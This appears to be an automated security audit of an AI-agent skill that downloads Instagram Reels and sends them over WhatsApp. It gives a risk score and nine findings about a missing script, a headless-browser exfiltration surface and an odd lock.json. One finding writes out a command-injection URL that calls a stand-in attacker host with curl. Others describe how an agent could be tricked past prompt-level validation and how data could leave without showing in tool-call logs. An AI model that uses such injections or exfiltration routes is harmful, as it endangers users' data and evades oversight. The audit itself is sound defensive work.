Is besaif/instagram-reel-downloader-whatsapp safe?

https://github.com/openclaw/skills/tree/main/skills/besaif/instagram-reel-downloader-whatsapp

63
CAUTION

This skill claims to download Instagram Reels via a third-party scraping site and deliver them over WhatsApp. The most significant concern is the complete absence of the primary execution script (download_via_sss.mjs) from the source code corpus, making it impossible to audit the Playwright browser automation that is the core risk surface. Two additional anomalies — a lock.json referencing an unrelated skill and a shell-injectable URL parameter — elevate the risk profile beyond what the clean SKILL.md alone would suggest. Canary files were not modified, and installation behavior was normal, but the missing script and lock.json irregularity warrant manual review before deployment.

Category Scores

Prompt Injection 72/100 · 30%
Data Exfiltration 45/100 · 25%
Code Execution 60/100 · 20%
Clone Behavior 80/100 · 10%
Canary Integrity 72/100 · 10%
Behavioral Reasoning 50/100 · 5%

Findings (9)

CRITICAL Primary execution script content not captured by audit -25

scripts/download_via_sss.mjs is listed in the skill file inventory but is absent from the source code corpus despite the audit collection explicitly searching for *.js files. This file is the highest-risk component of the skill (arbitrary Node.js running a Playwright browser session) and cannot be statically analyzed for malicious behavior.

HIGH Playwright browser automation creates unaudited exfiltration surface -20

The skill launches a headless Chromium-family browser via playwright-core. An unreviewed .mjs script can use the Playwright page API to fetch arbitrary URLs, read local file:// paths, or exfiltrate in-memory environment data over the browser's network connection — all without the agent's tool-call logs showing anything beyond a single node subprocess invocation.

HIGH lock.json references unrelated skill — anomalous supply-chain artifact -20

The .clawhub/lock.json shipped inside this skill's directory records academic-research-hub v0.1.0 as a pre-existing dependency. No legitimate downloader skill requires an academic research skill as a dependency. This could manipulate an installing agent's dependency/trust state or serve as a marker for a companion malicious skill.

MEDIUM User-supplied URL interpolated directly into shell command -15

SKILL.md step 2 instructs the agent to run 'node scripts/download_via_sss.mjs ""'. If the agent constructs this via sh -c or equivalent, a URL containing shell metacharacters (e.g., https://www.instagram.com/reel/x$(curl attacker.com)) achieves command injection. The URL validation in step 1 ('Accept only https://www.instagram.com/reel/... links') is a SKILL.md instruction to the LLM agent, not a code-level sanitization — it can be bypassed if the agent is tricked or if validation is imprecise.

MEDIUM Credential-class files opened during audit; attribution ambiguous -10

auditd PATH records show six credential-class honeypot files were opened twice during the audit window. Canary integrity confirms content was not modified. Temporal analysis suggests OATHE's own canary infrastructure caused both access clusters, not skill code. Attribution remains ambiguous due to absence of SYSCALL-level process identification for these specific PATH records.

MEDIUM WhatsApp send capability combined with unaudited script creates exfiltration pathway -15

The skill instructs the agent to send a WhatsApp message with a media attachment. An unreviewed Playwright script could write harvested data (screenshots, extracted text, credential file contents) to a temp file using the MEDIA_PATH output protocol, causing the agent to then transmit that file to any WhatsApp recipient the script encodes.

LOW BROWSER_EXECUTABLE_PATH accepts arbitrary binary path -8

The skill reads BROWSER_EXECUTABLE_PATH to locate the browser binary without any path validation mentioned in SKILL.md or cleanup_reels.sh. If an attacker controls environment variables in the agent runtime, they can substitute an arbitrary binary.

LOW Post-install TCP connection to AWS IP (54.211.197.216:443) -5

A persistent TCP ESTABLISHED connection to 54.211.197.216:443 (Amazon AWS) appeared after installation. The ss output attributes this to 'openclaw-gatewa' (pid 1090), consistent with the openclaw infrastructure rather than skill code. Flagged for completeness.

INFO cleanup_reels.sh is well-scoped and appears safe 0

The cleanup script uses strict mode, restricts find to maxdepth 1, and matches only reel-*.{mp4,mov,mkv,webm} filenames. No privilege escalation, no curl/wget, no exfiltration. Minor: REEL_DOWNLOAD_DIR is environment-injectable.